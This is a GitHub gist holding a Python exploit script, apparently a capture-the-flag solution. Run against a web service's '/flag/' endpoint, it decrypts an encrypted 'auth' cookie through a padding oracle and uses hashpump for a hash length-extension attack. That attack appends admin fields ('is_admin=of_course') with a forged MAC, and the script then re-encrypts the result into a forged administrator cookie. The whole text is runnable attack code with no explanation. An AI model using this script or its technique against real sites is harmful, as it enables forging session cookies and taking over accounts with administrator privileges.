3DES-HMAC Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
from pwn import * | |
from base64 import urlsafe_b64decode, urlsafe_b64encode | |
from oracle import PaddingOracle | |
from hashpumpy import hashpump | |
import requests | |
base_url = sys.argv[1] | |
cookie = '' | |
try: | |
cookie = read('cookie.tmp') | |
except IOError: | |
resp = requests.post(base_url + '/login/', data = {'username':'lol','password':'lol'}, allow_redirects=False) | |
cookie = urlsafe_b64decode(resp.cookies['auth']) | |
write('cookie.tmp', cookie) | |
def query(val): | |
for _ in range(3): | |
try: | |
resp = requests.get(base_url + '/flag/', cookies = { 'auth' : urlsafe_b64encode(val) }) | |
return True | |
except requests.exceptions.ConnectionError: | |
pass | |
return False | |
cookie_decrypted = '' | |
oracle = PaddingOracle(query = query, block_size = 8, nested = 3) | |
print "Decrypting cookie..." | |
try: | |
cookie_decrypted = read('cookie_decrypted.tmp') | |
except IOError: | |
cookie_decrypted = oracle.decrypt(cookie) | |
write('cookie_decrypted.tmp', cookie_decrypted) | |
print "Decrypted Cookie:" | |
print hexdump(cookie_decrypted) | |
mac, pt = cookie_decrypted[:16], cookie_decrypted[16:] | |
key_size = 16 | |
print "Extending cookie..." | |
new_mac, new_data = hashpump(enhex(mac), pt, "&username=almighty_administrator&is_admin=of_course", key_size) | |
print "New MAC:", new_mac | |
new_cookie = unhex(new_mac) + new_data | |
print "New Cookie:" | |
print hexdump(new_cookie) | |
print "Encrypting cookie..." | |
extended_cookie = '' | |
try: | |
extended_cookie = read('extended_cookie.tmp') | |
except IOError: | |
iv, ct = oracle.encrypt(new_cookie) | |
extended_cookie = iv + ct | |
write('extended_cookie.tmp', extended_cookie) | |
print 'Cookie:', urlsafe_b64encode(extended_cookie) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment